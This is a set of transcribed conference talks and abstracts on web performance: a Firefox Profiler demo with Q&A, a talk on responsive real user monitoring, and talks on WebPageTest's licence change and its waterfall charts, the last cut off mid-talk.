see a red marker that means firefox wasn't responsive at that time. So you see a huge red marker there and that means bad things are happening here. So if you look at that jank marker I mean this reflow markers there are hundreds of them. And let's look at the flame graph. Let's see what we can see, what we can figure out. And so this is the reflow we already seen so we should look at the reflow. So you can either go back to only JavaScript but also it's good to see the reflow because we want to know what is actually triggering the reflow right. So the thing that is being triggered is get bounding client-rekt and it's being called by update with. So actually you can see the same data called tree 2. You can just invert it and you're going to see that there is a reflow happening all the time. When you go in you are going to see the bounding client-rekt and that is being called by update with. So I'm going to just right click and copy the function name and I'm going to go to my code base and then search this. So this is the function that is being called all the time. So and this is the get bounding client-rekt that is responsible of the reflow. So this is, this should be improved or like we should either reduce the call of this because whenever we call the get bounding client-rekt it always triggers a reflow. So we should avoid using this function as much as possible. But since we have lots of tracks here it's calling like 800 times or something. So that's why that's the problem here. So actually this, I cannot solve this right away in this demo section because this needs a bigger architectural change in the code base. But at least in a very easy profiling session we can just understand what's the comp with and what's the reason that is taking so long, right? So it's pretty easy. And I'm going to look at the second issue now. So you've seen the reflow issue and this is about the marker chart. So whenever we try to like hover over those, as you can see it's taking some time to open the tooltip. So it's not very responsive right now. We need to figure out why this is happening. So I'm going to again start capturing with control shift 1. Then actually let me start again and then I'm going to just do back and forth and when I'm done I'm going to capture it with control shift 2. So as you can see there are again some red markers. I want to focus on this area specifically because I think we can see more clearly here. And I can look at that and let's invert the cold stack and we see that draw markers is taking a lot of time. So we can clearly see that draw marker is the copper. So let me look at the flame graph and in here again draw markers is taking a lot of time and also to the canvas context that fill is also taking a lot of time as well and this is being called by draw1marker. So I'm going to also copy this function name and search it. So this is that function and here there's the context.fill. So this is being called all the time and it's taking quite a lot of time but since this is a JavaScript API we cannot make it more performant. So the thing that we should do is to either work around with either like removing the cold if it's possible or reduce the amount of colds. So let's see where we are calling this draw1marker. So draw1marker is being called from the draw markers I think. So we should avoid calling this as much as possible and there's an if check to avoid this. So it says always render non-dot markers but also do not render dot markers that occupy the same pixels as this can take a lot of time and so this is actually the thing that we want. So actually we've previously somebody else did a performance improvement on this but I think this performance improvement is not working quite well. So when I look at this Boolean expression it's not correct. So I know this because I know the code base it might not be very clear to you but actually it should be something like this. We should not compare it with zero but we should instead compare it with dot width. So when we do that actually this will be the correct expression here otherwise when we do this zero it will always be true. So that's it. I might have to cut out some of the parts from the demo session to fit that into my first time schedule but I'm hoping that it's not going to be too much. So thank you all for coming to my talk and I hope that was helpful for you. And you can find the Firefox Profiler documentation and slides in these links. Also you can join us in the Firefox Profiler Metrics channel to ask us any questions. Thank you. Okay I think we are live now. And we are live. Yes I am joined here by Nazim from Mozilla. We're in the Q&A session after the talk. Hello Nazim. Hello. Thank you. Let's get into the questions. So the first one here is from Patrick. Is there a way to start, stop or export the Profiler from WebDriver or from another automation extension after collecting them? So currently I think we don't support WebDriver yet but we have some internal tools called Raptor. So I guess you can use that also in your project too because it's open source or there's browser time tool that supports Firefox Profiler. So you can capture a profile with browser time and then you can add dash dash Gekko Profiler I think and then it will automatically capture the profile itself too and then you can just drag and drop that JSON file into the profile that Firefox.com and it will show you the profile. I hope that answers the question. Let's see if there are a follow up there. Yes the next one is from Peter. Do you know how much overhead the profile adds when you're doing the recording? So yeah it's pretty significant if you don't like if you don't want to profile it and like I wouldn't recommend it to like open all the time. So the Web Developer preset is actually using a lot less resource compared to other ones. So I would recommend you to use that also like if you select custom preset we have like a like a big list of like settings and in that settings you can select like do not sample. So if you disable sampling it will only capture the markers and if you're okay with that like if you're okay with just markers and if you think that it's going to be enough for you you can reduce the overhead significantly and it also like overhead generally depends on like how many tabs you have, how many processes you're profiling, how many threads you're profiling so it can depend on like a lot of different things. But yeah you can like the first thing is you can use Web Developer preset and then it can disable the sampling if you if you don't want that. Next question from Toto. How long are the profiles uploaded for and is there a way to delete them for example in case of mistake? Normally they're uploaded and then they're there forever but we want to change that policy to like expire in like six months so but there's actually a way to delete that. So let's say that you've uploaded a profile and we place like a cookie or something in your local storage that this is uploaded by you so if you go into that profile again you can delete it by going on the top right corner and you can go into the profile information panel and then there's delete button. You can delete your profile and it will be automatically deleted from our servers or you can go to the home page and in the home page you can actually like see the profiles that are uploaded by you so you can also look at the list there and delete from there.
The Firefox Profiler is a profiler that is built into Firefox. It has tighter integration with Firefox than external profilers. With its special annotations on Firefox's source code, it tells you what's happening at a point in time on your JavaScript code. With various measurements, it can provide more information and insight into your web application. During the talk, I will be briefly explaining the profilers, how to capture a good profile and how to analyze the profile data. I will be sharing Firefox Profiler specific features and how to make the best use of them. In the end of the slides, I will be doing a demo on how to analyze a performance problem. A profiler is a tool that monitors the execution of an application and gathers the data about the program execution in that time frame. Using a profiling tool to look at problems can make it a lot easier to figure out what’s going on in the application. It helps you to get detailed information about the execution of your application and it allows you to understand the behavior of it. At Mozilla, we are working hard to make the Firefox Profiler better for web developers. In Firefox, we are replacing the old performance panel inside the Developer Tools with Firefox Profiler so people can fully utilize all the new features that come with Firefox Profiler. We are both happy and excited to share more about this tool!
10.5446/52828 (DOI)
Hi, thank you for joining. This session is all about responsive run. This is a very simple technique all of you can apply to get more value out of your run data. My name is Tim and I'm a web performance architect at Akamai and I also run the largest scale modeling website in the world and on a day-to-day basis I'm in touch with real user monitoring and I really like run or real user monitoring. Why? Because it gives me very valuable insights in the performance of my website under real-world conditions. No matter if my visitors are using their cell phone on the train or if they're sitting at home in the sofa using a tablet, I can see how my website behaves under these conditions. So that's great. So I love run. Now my love is not endless and the main reason why it's not endless is it is not responsive. Real user monitoring, all the tools, open source or commercial are very modern and still they don't support responsive design. They support core web vitals. They support single-page apps or some of them can even measure service worker startup time. So all modern techniques, still responsive design, which is not new, is not supported. The closest we can get is this very simplistic classification, desktop mobile tablet. You see this everywhere. Now from my perspective in order to measure, to analyze performance, this is too simplistic. It might have worked 10 years ago when devices looked like this. Today, where large phones can be bigger than small tablets or where large tablets can be bigger than small desktops and where some people have big screens like this, this very simplistic classification no longer works. So in order to get most of your run data, we need in a responsive world, responsive run. And there are two things I will share with you how you can get there and it's actually quite easy. But before we get there, we need to fix a first bias, bias, the device type bias. What do I mean with that? If you're looking at your data, you see every tool has this classification. So 48% of my users are mobile. Now when I zoom in on mobile, in my mind, I make this automated connection that mobile corresponds to cellular. And when I zoom in on desktop, it corresponds to broadband. Now we all know that this is not true. Still in day to day discussions, in day to day blog posts, when we talk about mobile, hey, how is your mobile performance? You will answer in a talk about a phone on a cellular connection. Oh, my mobile performance is much, much slower than desktop. Desktop meaning desktop in combination with broadband. And this is everywhere. Google page speed insights, awesome tool, love it. Here we have two classifications, mobile and desktop. Mobile, if you read the documentation, it's a mid-range phone using a cellular connection. While desktop is a big screen on a fast connection. So it's really everywhere. Now why is this a problem? It's a problem because it can really ruin your analysis. Let me share two examples. This is the connectivity of mobile devices on my website. Now suppose you look at the medium, largest contentful paint or any other timers. What would you look at in this case? Here you see that almost 70% of the users is using a cable connection. That's somebody sitting at home connected to the Wi-Fi. That's still a broadband connection. Now if you're looking at, if you're just focusing on mobile and you're looking at all the data and you think you have no performance problem, you might be wrong. Why? Because you're actually looking at a mobile device on a cable connection at the medium levels. Same for desktop. Many of my customers, they like to look for desktop at the higher percentiles. For example, 90th or 95th percentile. If you do that and you wonder why is my performance on desktop so slow? Look here, 15% is using a cellular connection. What is that? In a world where we could still travel, that's people on the train using their work laptop and connecting to the Wi-Fi of their cellular phone, which remains a cellular connection. Or some of my visitors are really living in the middle of nowhere and the only way to get internet is a cellular modem in their homes. So first thing is before we go into the next steps is make sure that whenever you zoom in on your performance, don't make the mistake to just look at the device type. Take at least into account the device type and the connection. Now, screen quality. The very simplistic classification does not take into account screen quality. And again, 10 years ago, 8 pixel was 8 pixel. In 2021, we have retina screens, some screens on some phones having even 3x or 4x. What does it mean? That the amount of image pixels you can ship in order to have good quality needs to be increased. How do you do that? This is an example from my website, a very simple thumbnail. 10 years ago, that was 160 pixels big. In order to have a good quality on a retina screen, I need to add the source set element. So I specify if you're a retina screen, don't ship the 160 pixels image, ship the 320 pixels image because that's 2x. Now, why does that matter from a performance perspective? You might ask. Here, it's a thumbnail. Who cares? Here is for this thumbnail default, 6 kilobytes, one and a half X is 10 kilobytes and the 2x version is 22 kilobytes. Now, performance difference between 6 and 22, who cares? Now, this is a thumbnail. Suppose you have a search with 50 thumbnails. 6 times 50 is 300 kilobytes. 6 times, sorry, 50 times 22, it's more than 1 megabyte. Will that impact the performance? Does that impact your performance budget? Likely yes. Maybe not on a desktop connection, but on a cellular connection, potentially yes. So how do you get that extra information in RAM? It's very easy. In JavaScript, if you type in window.devicepixelratio in your console, you will get the DPR or device pixel ratio of your screen. So what do I do on my website? I read that variable on every page and I send that to my analytics, both the marketing analytics as well as RAM. And what information do you get? Something like this. So 1x, 2x, 3x, but also more strange values like 2.625. That actually a very popular Samsung phone and many other verres. Like here you even see 4x. Crazy big. Now, if we zoom in on mobile, what do we see? Two things. First, where do you spot 1x? It's not on the screen. And then you see that very strange value 2.549999. You see the craziest DPR values. It also depends on the resolution people set on their screen. So on my screen, I'm looking at now, depending on the resolution, it goes from 2 to 2.2 or a very strange value like 2.14x. So this also brings me to the biggest issue. If you capture the DPR, there's so many different variations. It's a bit complex. So the cardinality, there's so many different variants makes it almost impossible to really analyze. Now, what we need to do here is, is this important information? Yes. But from a website perspective, we can actually simplify this and really make it usable. Let me show you how to do this. So by default, I put, I say that my data layer equals 1x. On my website, I know I only have a 1x, a 1.5x and a 2x versions, meaning a screen of 3x, 4x or 3.75, all the special things. If it's bigger than 1.75, the browser will decide to pick the 2x versions. So the browser picks the DPR, which matches closest to the one you provide, meaning a device pixel ratio of 1.4 will pick the 1.5. A device pixel ratio of 1.622222 will pick the 1.5. So all these different variations, here is a slight reminder. If I take into account this formula, I get this. Because in the end, I don't care about the exact device pixel ratio. I care about how many bytes do I ship, which images do I ship? And they're basically just three variants. So my home page has three variants, the 1x version, the 2x version and the 1.5x version. Now, DPR is, if we zoom in on mobile, what do you see? All these variations on the left become this very simple 2x version. So what did I learn from this? That 1x on mobile is dead. Now, that will allow me to do two things on my website. First is all my hero images, the current 360 pixels variants of my hero images. I will remove them. There is no need for them. So that will, I have two million different product images on my website. So that means I can remove two million images times 360 pixels. That's one thing. The other benefit is that the chance that the 1x version is in the cache of my CDN is actually low. Why? There is so few traffic. So I can actually make the trade off. Isn't it faster to serve the 1.5x version from cache? Which is, yes, a little bit bigger versus sending the 1. So those are the analysis you can do. Why? Because you have the data. Now, screen quality is one thing. Another thing we need to look at is screen dimensions. My first idea was, you know what, we have desktop tablet mobile, too simplistic. You know what, let's look at the screen dimensions. And this is a screenshot from Google Data Studio where I look into my Google Analytics and put many other tools to give you this. So very detailed, great. Now, again here, first problem, way too many values to make it easy to consume, to make it easy to do some performance analysis. Another issue with just looking at the physical device with is resizing windows. What if on a large screen, somebody puts two screens next to each other? Are you downloading the big version of your website or maybe the smaller version of the website? Same is when you pick your phone in Portrait Mode or in Zoom Mode, that might be a different version of the website you brought. And purely looking at the physical width doesn't give you the full picture. And then a third thing is Enforce Desktop. People on the phone, they use the mobile version. People on the desktop, they use the desktop version. And then you have all these different tablets and they're sitting somewhere in between. And many of my users, I have a feature where they can enforce the full desktop version and some people prefer the full desktop version, some people prefer the mobile version or something in between. Again, there, if you're just looking at the physical width, I can't detect it. So good thing is the solution is again very, very simple. Let me explain. This is my website. It doesn't matter, don't look at the content, but this is, I have 500,000 of these product pages. And from all these hundreds of different device widths or device screen sizes, from a performance perspective, we can actually simplify this. This is now a screenshot from a very large screen. If the screen is a little bit smaller, what happens? You just have the margin which becomes a little bit smaller. Make it a little bit smaller, the same. The content in the middle stays the same. It's still the same image, the same amount of images, the same content, everything. So all these different variations, in the end, I serve the same version. And I give these versions a name. So that's 720 pixels. That's for the main content area and a large sidebar. Same here. That's still the 720 pixels with a large sidebar. So it's the same variant I ship to the end user. It's only at a certain point in time that there is not enough space for the large sidebar. So I have a 720 pixels. That's still the same content with a small sidebar. And what are some differences is I will serve different ads, different sizes, different types of ads. So I want to look at the performance there. If we make the screen a little bit smaller, at a certain point in time the sidebar will go away. If you make the screen a little bit smaller, then the picture element and the world kick in. So I will no longer ship the large 720 pixels image. I will ship a 540 pixels image. And then if you make it even smaller, you'll be at the 360 pixels version. So if you look, if you take into account all these different device types and you flip that into what version of my website, what breakpoint of my website am I actually shipping, then it becomes much, much easier. Let me show you how I did that on my website. So I take into account, I call that the design breakpoint, and it looks at the scroll width. So not the device width, it looks at the scroll width. Next, what do I do? I take that value and I put them into buckets. So every screen larger than 1080, I ship the same version 720 large between 767 and 700s, that's 70, 20 small, et cetera. And at the end, if it's smaller than 500 pixels, it's a 360 no version. Key here is don't exaggerate. Or take the key breakpoints where you actually ship other data. For example, I have a 360 and a 400 breakpoint in my CSS. And the only difference is that I changed a bit the font size. I didn't take that into a, I didn't use that as a design breakpoint. Otherwise, you just have way too many variants. So how does that look? This screenshot from my Ramp tool. And you see that 54% of my users uses the full version. I don't know which screen, large, very large, super large, resized, that's the version. So it allows me to look at what is the performance of my website in this specific version. If we then zoom in on mobile, just out of curiosity, what do we see? 94% uses a 360 pixels no version. But still here, suppose you're looking at the 95th percentile on mobile. Why is that so much slower than the 75th percentile or the medium percentile? What do you see here? In this case, it's likely because you ship 700, you ship the 720 pixels image variants because this is users enabling the desktop motors. So if you don't have those insights, you can be really on the wrong foot with your analysis or even come to the wrong conclusions. What is also tells me is that all the work I did on the 720 no and the 720 large on for mobile does not matter. This is the last screenshot before I want to finish. This shows you ampulse around where I use this in action. So I zoom in on mobile and cellular because I want to look at what interests me. And then I can zoom in on, in this case, you're looking at the deep design breakpoints, but I can do the same for DPR, the earlier thing. And I can validate how many bytes do I ship to the 720 pixels version? How many bytes do I ship to the 360 pixels version? Because it will differ. Your performance budget might be perfect for the 360 pixels one, but you might have, you might exceed that on another design breakpoint in combination with DPR. So to conclude, responsive run is an easy way to get much more value out of your data in a responsive world. What do you need to do? You take the device classification, which is available everywhere. You take the connection, which is likely available everywhere. And then on top of that, you add two additional dimensions. One is your image breakpoints, one X2X3X. And the design breakpoints, what versions or variants of the image of the website am I serving to my end users? So with that, I would say thank you for your time. After any questions or feedback, we should still have around three minutes to do that. Thank you.
Categorizing device types by desktop, mobile and tablet no longer works in 2021. It is oversimplified, meaningless and likely breaks your current performance analysis on a modern responsive website. As #perfmatters we need meaningful monitoring that takes into account the modern web: - Screen dimensions - Device pixel ratios - Image and CSS breakpoints - Connections Keeping it both simple and meaningful is however not easy! Learn about the different approaches and how to apply this to your existing RUM monitoring solutions: be it free (Google Analytics), open source (Boomerang) or commercial.
10.5446/52830 (DOI)
Hi everyone, I'm Pat Mienen. I'm here to chat with you about WebPageTest. It's been a fairly eventful year. I want to talk a little bit about the licensing changes, the catch point acquisition, and sort of some of the background on why we picked the license we did, particularly being a FOSS conference I thought it would be interesting for everyone, and also some updates on what we've delivered since then on sort of where we're going and what excites me about it. So really quickly, overview on WebPageTest as a project and sort of as an ecosystem. There's the open source code in GitHub, which is sort of the core of WebPageTest. It has the web server code, the agent code, a bunch of utility scripts for installing, and it's sort of the core. Everything you need to build a WebPageTest is up there on GitHub. Up until recently, it was all under a BSD license, so you could do whatever you want with it, and anyone could do whatever they wanted with it. There's public instance of it, so sort of what you know of WebPageTest is webpagetest.org. It's the public WebPageTest instance that I run historically out of my basement and with partners running test locations globally. There's the HTTP archive, which is probably one of the biggest WebPageTest instances, which is also publicly available and managed by a team of us, runs 14 million URLs monthly, whatever take on their own private instance of a public WebPageTest and collects all the data and makes it available. There's a bunch of internal use private instances that companies around the world run. They just take the code or the available images and run their own WebPageTest either within their firewall or just for doing a lot of testing, usually API testing stuff that you couldn't do with the public instance because it was running on my infrastructure in my basement. You needed to do at scale testing or you need to test behind your firewall. Then there's a few commercial services that are built on top of the WebPageTest code as well. They use WebPageTest for doing all of the underlying testing and then they build their sort of value add on top of the underlying WebPageTest. In addition to the free code that's up on GitHub, there's images that I provide on AWS and GCE that primarily for the agents, there are server instances, images as well. You can scale up and down testers if you would as needed in the clouds in whatever location you want. Those are used both by the public WebPageTest as well as private instances and some of the commercial services were using those as well. Full of last year, give or take, I think towards September, Catchpoint acquired WebPageTest.org, the public instance of WebPageTest that I run. As part of that acquisition, we're sort of figuring out what we're definitely focused on keeping it open and free for everyone to use. If you're running private instances, we want to continue to support that market. We want to try and keep the community as engaged as it has been over the years and add engineering resources to it as well. Part of what we also want to do is build a commercial service around WebPageTest. Somewhat like what you see with a lot of the commercial monitoring, but maybe we can put our own spin on it in a way that is WebPageTest unique. They need to make some of their money back from the acquisition and make it worthwhile, but not at the cost of the community. What we've been balancing is trying to figure out how do we walk that line and how do we make it as open as possible and keep the community as engaged as it has been over the years and still have a commercially viable path for Catchpoint. When you're building a commercial monitoring service, if you would, the cost structure behind it, a good chunk of cost comes from the actual infrastructure, right? Running instances on the cloud in data centers, running the server, storage of test results. Like right now, the public instance I think has somewhere around 30 terabytes of test data stored historically. On S3, that gets to be fairly expensive if you're storing it on S3. On top of that, you have the product engineering and support for the value add wrappers that you put around the testing. Then there's the engineering, if you would, the costs around building the agents, supporting the browsers, adding new features, dealing with the Chrome changes that come out every six weeks, supporting the instances and that kind of stuff. Catchpoint in a top to bottom stack has to absorb all of those costs, right? If we make and we continue to make the agent available for free for all of our competitors and we absorb all of the engineering costs for the agent development, all of a sudden we're at a competitive disadvantage even though we're sort of building the technology. If all of our competitors get to use all of our engineering for free and they don't have to invest in that, they can have lower cost basis and undercut us on price, which doesn't seem fair. We wanted to figure out sort of where that line falls. To be clear, somewhere around 95% of the code contributions to the WebH test agent code or the WebH test code in general comes from me. And 4.9% comes from the community and it's awesome to see the engagement. And around.1% of the code comes from other commercial providers. And so that 95 to.1% basis is sort of what we're talking about here. And if it was more of a 50-50, then we'd all be sort of absorbing the costs. But we need to figure out a way to distribute those costs. That's fair without compromising the openness for the community and the ability for everyone to just continue using the code in cases where they're not competing with Catchpoint. And so we looked at a bunch of options. And so the easiest option obviously is do a fork. That's what all of the commercial vendors do and do all of our development in secret. It doesn't feel like a great solution for WebH test in general because that cuts off the community and everything else. And so we want to continue to contribute for the community for everyone running private instances to be able to continue to benefit from that work. And so a private fork didn't seem like a good idea. We did look really hard at all of the OSI approved licenses, trying to keep it as open source as possible. Unfortunately, they're all sort of from the days of licensed software that you distribute, put on floppies, or send around. And so they protect code distribution. They protect if someone redistributes your code as part of their product. But they don't work very well in a SaaS offering. And so if we protect it with like an AGPL license or something like that, there's nothing stopping from someone building a complete SaaS offering and never distributing the code built on the same code. And so it didn't seem like a great solution. We couldn't find any license that protected use rather than distribution. And so another option, and this is like what Mongo and Redis ended up having to do with their service offerings and their code, is build a custom license. And we looked long and hard at that. If we could avoid it, we'd like to avoid a custom license. We'd like to try and stay as standard as possible and have as little explaining to do about what's special about our license. And so we came across the, and with help from lawyers in this space, the Polyform Project, which is a set of licenses that came out of the work that Mongo and Redis have had to do to protect SaaS offerings. And so it's what they call a code available license. It's not technically open source because it's not OSI approved. But it makes all of the code available with various different restrictions depending on which one of the licenses you picked. And so we picked the Polyform Shield license, which was the most permissive that we could find that would still give us protections against a competitor using our code without contributing to the, to the either, either the code or to the, the costs of development. And so what that ends up doing is we forked, well, yeah, we branched the GitHub code. So there's an Apache branch of the code, which the community is more than welcome to continue to contribute to. It continues with the Apache 2 slash BSD open license use, do whatever you want with. But the main trunk of the code is now under a Polyform Shield license, which is as permissible as possible. So you can use it for anything you want, as long as you're not using it in a way that competes with catch point. And so if you're using it for internal use, you can continue using private instances, continue using all of the code that we develop. We're going to try and keep it as open on GitHub and up to date on GitHub as we develop it. If you're running one of the public instances, you're running HTTP archive, for example, we're going to continue to work with them on using the latest and greatest code. If you're running a commercial service, that's where you're going to have to either contribute and work with the community on the Apache branch or work with us on a license for the commercial license for the Polyform for the main tree so that it sort of evens the playing field. And that's sort of a lot of the background on why we picked the license that we did. We're trying really hard to try and keep this as open as possible for the community to continue using the way they have been and minimize the disruption to as many people as possible while still keeping it fair for everyone involved. And so off of the licensing background and into sort of some of the more exciting features, you know, what's been happening, what have we been working on with web page tests since the acquisition. And so, you know, core web vitals, they're the latest and greatest, they're coming out, they're going to be impacting search results. We've been trying to figure out how do we expose the underlying what's going on with the core web vitals more to developers. And so one of those is largest contentful paint. To me, this is sort of the most exciting of the core web vital metrics. When has the core content become visible? And so one of the recent additions is in the film strip view of web page test, if you ask it to highlight the largest contentful paint events, the candidate events as the page is loading will get highlighted in blue. And then the last largest contentful paint, which is the one that ends up being reported as okay, this is the largest thing that was loaded in the loading sequence gets highlighted in green. So you can see what the LCP triggering event was, and you can do some validation. There have been browser issues where, you know, it reports the wrong thing or the content is visible way before LCP triggers and it sort of gives you a way to validate that as well. But it also lets you see what it's triggering on so you can figure out, okay, how do I optimize in getting that piece of content loaded sooner. Just layout shift debugging. There's sort of a few aspects to this. This is the core web vital that wants to make sure that the content on the page doesn't shift around a whole lot after the user loads the page. And so the first thing that we landed was, and you can say highlight layout shifts at the bottom of the film strip, it'll highlight in red box around the piece of the content that moved since the previous frame. So you can visually see what's going on. But that doesn't tell you is how much the content moved and how much it contributed to the overall CLS. And so what we also added was below the film strip, there's a number that tells you, okay, on the right is the total layout shift for the cumulative layout shift for the whole page loading. And then on the left is how much this frame contributed to that. And so, like in this case, the first frame, it looks like a whole lot of the content moved, but it actually moved a very little bit. So it doesn't contribute to the CLS a whole lot, whereas the last frame where it put a sort of video header across the whole thing and moved all of the content down, that one was both a large piece of content and moved a lot and contributed significantly. That's the main source of the CLS in this page loading. And then we get into sort of what really excites me is sort of expanding the browser footprint. Chrome, the Chrome team is awesome. They've got awesome developing tools, debugging tools, remote management support. And so a lot of testing is done with Chrome. Unfortunately, that doesn't cover all of the market. There's a huge amount of the market that is on Safari. And I've been trying to figure out, okay, what can we do to get better testing on Safari and make it easier to test on Safari? You can emulate an iPhone on Chrome, but it's a different rendering engine. It's a different networking stack and prioritization. It's a different JavaScript engine. It's a different graphics engine. And so while you may be loading content that's targeted at the iPhone user agent string, it doesn't actually behave like Safari would. And so my first pass at that is we added support for Epiphany and Linux so you can test with WebKit. It gets you close. It gets you the rendering engine and the JavaScript engine from Safari, but it doesn't get you the networking stack. And to me, that's kind of a big deal. And so much more recently, and it should be hopefully announced by the time this comes out, is added support for the iOS simulator. And so WebPageTest has had support for iOS device testing, but scaling devices is hard. You need a lot of devices. Raspberry Pi is the networking setup is complex. We can now run WebPageTest in the iOS simulator, testing every device form factor that's available using the real Safari engine with real networking stack and the whole shebang. And so, and we get all of the detail that we get when we normally run Safari on real devices. So we get the full waterfall. We get almost every feature that's available in WebPageTest is available with Safari as well. And the really exciting piece to me is Apple Silicon. So we can now run WebPageTest on M1 Max using the native binaries. So Chrome arm build is interesting, but what's really interesting is the iOS simulator on an M1 silicone Mac because it's running the same CPU that the phones are running. And so we benchmark them, octane two on an iOS simulator versus an iPhone 12 return identical results. And so with one Mac mini now, you can test every device form factor running the real silicone that are running iPhones running Safari. And so you can do all sorts of really scalable iOS performance testing and Safari performance testing now. And so I'm really excited to see where we can take that. And that's it. I've got a couple minutes for questions and I'll hang around. So thank you very much. You can always ping me on Twitter as well at Pet Meanin.
Patrick will discuss the background behind the WebPageTest license change from Apache to Polyform Shield as well as the new features introduced to WebPageTest since the acquisition by Catchpoint.
10.5446/52831 (DOI)
Hello everyone. First, thank you to the Fozden Web Performance Dev Room organisers for allowing me to speak today. I'm Matt Hobbs. I work for the UK Government Digital Service as head of front-end. As well as front-end, I have a keen interest in web performance optimisation. But today I'm not here to talk to you about the wonderful world of UK Government Services. I'm sure you're all disappointed. I'm here to talk to you about a tool you may or may not have heard of. And that is a web page test. This talk is mainly about a very specific part of a web page test. And that is the waterfall chart. Now, the chart may look intimidating at first, but once you understand it, the visualisation really unlocks a heap of information for you at a glance, allowing you to quickly debug issues, certify they are fixed, and how exactly a browser loads the page. There are a couple of bits of assumed knowledge for this talk. First is a web page test URL. For those unsure, it's this. This will bring you to the public instance of a web page test where you can test your site's performance for free. Second is you have run a test. Don't worry, though. If you haven't run one, I just so happen to have a whole blog post all about it right here. A shameless plug, I know. So first, let's cover a little background info. What is web page test? Web page test is a synthetic performance testing tool created by Pat Mena in 2009 while he was working at AOL. It was originally an IE plugin called Page Test before evolving into the online version we see today. Web page test was recently acquired by Catchpoint in 2020. Pat, along with the rest of the Catchpoint team, will help maintain and grow it in the future. But for the past 12 years, the public instance of web page test, including all the test devices, have been sitting in Pat's basement. This image is from 2014. I assume his basement may have changed a little in six years. Web page test allows you to run web performance tests from any of these locations in the world. You can configure the test agents to test your site using a whole host of browsers with many different connection speeds. The date you get back from the tool is invaluable for spotting and fixing web performance issues. Enough of the history of web page test, let's dive right into the waterfall chart. Here's a basic web page test waterfall chart. This test is from my own blog. This chart is essentially a visualization of the raw data you get back from various browser APIs. I'll split this image into seven sections. I'll go over each very briefly. Number one, the key. Here we see a series of colors. First, a set of browser and connection events like weight, DNS, connect and SSL. Next, a set of color coded files by their mind type. You'll see two color tones for each. I'll go on to what that means a little bit later. Last, in pink, to the right is the JavaScript execution time. Each of these colors corresponds to an event or request you will see on the request timeline. Number two, the request list. Here we see the list of assets found on this particular page. There in the order, the requests go out over the network. The h value in this instance is at request number one at the top. But this is not always the case. Redirects and OCSP lookups can sometimes come before the page HTML. Number three, the request timeline. Here we see the waterfall. It's much like you would see the network tab in your developer tools. The color coding we saw earlier in the key applies here. Each asset is on its own separate row. The timing seconds is along the top and bottom of the image. But this could also be milliseconds for some tests. But there's a whole lot more going on in this image that I will cover soon. Number four, CPU utilization. Here we see a line graph of how much load the CPU of the test device was under at any point in time during the page load. It ranges from zero to 100% utilization. It's always a good idea to keep an eye on this chart, especially on low spec devices. This is to see if the CPU is becoming a bottleneck for performance. Number five, bandwidth in. This graph gives you an idea of the data flowing into the browser at any point in time during the page load. The absolute scale isn't particularly accurate, but it's roughly related to the max bandwidth allowed on the connection. In the example here, the max bandwidth is 1,600 kilobits per second, and this equates to a 3G connection. You may want to use this graph to check that the browser is doing useful work rather than being wasted during the load. There's a much more accurate option available called a TCP DOM, and this is located under the advanced settings tab when you configure the test. You should enable this if you want more accurate results that you can examine using tools like Wireshark. Number six, the browser main thread. So this image isn't taken from my blog since it's only a small static site. It's nowhere near as busy as this. This is actually taken from one of the popular news websites here in the UK. Each of the colors correspond to a particular task that the browser on the browser main thread is doing at any point in time. The y-axis corresponds to the percentage of time that task is taking up. This graph is a great way to spot where the CPU has become a bottleneck and what task is causing it. These colors may look familiar if you've used the performance tab in Chrome DevTools as they are copied from there. And last, number seven, pages interactive. This thin bar gives you an indication of when the browser main thread is blocked. If the main thread is blocked for 100 milliseconds or more, the color will be red. If not, it will be green. A block thread may impact on inputs like button presses, but browser scrolling is likely to be unaffected as this is handled off the main thread. So now if we pull this all together again, this UI hopefully now makes a little more sense. You can think of this graph as a story of how the browser has loaded a page. Chapter one, first connecting to the server. Chapter two, the downloading and passing of the HTML. Chapter three, requesting the additional assets. Chapter four, pixels rendered to the screen and the final chapter where the story ends, the finalized page with all its assets loaded. Let's pull out some specifics for the waterfall you can see here. First, let's focus on request number one. We see a connection to the server. The HTML being downloaded and passed. The additional page resources found and queued for later request. That the pink line is mixed in with the blue asset color of the HTML. This is JavaScript execution happening during the HTML download and passing phase. In other words, the HTML page has two large sections of inline JavaScript in the page source. Next, on request 14, we see an additional TCP connection established under HTTP. This must be due to the asset requiring a cause anonymous connection since this domain already has already been used to download other assets on requests two to five using the connection established on request number one. Next, request 18, another TCP connection and the color of the asset is blue. This is a request for another HTML page most likely triggered by some JavaScript execution. Another reason why I say it was triggered by JavaScript is because notice where the TCP connection starts. It lines up with the inline script execution within the HTML on request number one. There's a very good chance that it was initialized there. Also notice how busy the CPU bandwidth and made for a graph file. This page is really working this device in all areas. That's not necessarily a bad thing. That's just a lot of useful work happening. The observant among you may have noticed a set of lines in different colors vertically down the page. These lines are specific events that happen during the page load. In the example on the slide we see start render in green and 0.6 seconds. Here the first pixels are painted to the screen. DOM interactive at 1.75 seconds in orange. HTML has been parsed and the DOM constructed. Document complete or the onload event is fired at 5.5 seconds. So static image content loaded but changes triggered by JavaScript execution may not be included. There are other lines that aren't on this chart but can be seen in the key above the waterfall. So look out for those two. And finally the request details panel. Each horizontal row is an asset request. If you click anywhere on a row a panel will pop up with a heap of information specifically about selected request and the response pack. Basic details like protocol and timing all the way through to request and response headers. If you're looking for all these details in a large JSON blob then the raw details panel will give you this. Using this panel for each request you can really dig down into the details. So now we've gone into the basic layout and what it all means. Let's look at some of the more advanced examples and point out some of the other features. Using web page test it's easy to examine the difference between HTTP 1.1 and HTTP 2. It's a good example to focus on as it's really easy to spot the differences. So both tests are from testing.gov.uk on desktop Chrome using a 3G connection. First let's look at HTTP 1.1. Notice the multiple TCP connections. Notice how eager the connections are on requests 3 and 4. This is a default browser behavior for HTTP 1.1 where it creates multiple connections early in anticipation for downloading multiple assets. Here's one DNS lookup shown in red which is then reused for the other TCP connections shown in green. And what are known as download chunks can be seen heavily in requests 5 to 7 and 17 to 18. So what are download chunks? This is where this is where the two color shades I mentioned earlier start to come in. The lighter color at the start is the time at which the browser sent the request to the server. The dark chunks of data coming back are for data from the server for this particular request. You may be asking what the yellow weight bars signify. So this is the point at which the HTML has been parsed but the request for the asset is yet to be made. You can see this in the waterfall by looking at where the blue HTML ends and the yellow weight bars start. In the case shown here this weight is because there are no free established TCP connections for it to make the request. Also notice how the bandwidth chart is empty has empty sections missing from it. In this example we have separate TCP connections fighting for a limited bandwidth but even with multiple TCP connections the bandwidth isn't fully utilized. This is what I meant before by the term useful work. By making sure the network connection is fully utilized during this important loading phase it should in theory improve performance by maximizing the number of bytes received by the browser. Now let's compare the exact same page browser and connection 